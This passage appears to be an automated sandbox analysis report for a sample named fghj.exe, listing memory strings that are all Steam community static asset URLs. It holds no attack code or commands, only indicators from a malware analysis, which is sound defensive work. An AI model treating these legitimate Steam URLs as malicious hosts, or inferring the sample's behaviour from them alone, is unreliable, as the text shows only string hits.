Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
              Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.j
              Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04ot
              Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
              Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
              Source: fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=VsdTzPa1YF_Y&l=e
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/sh
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.
              Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
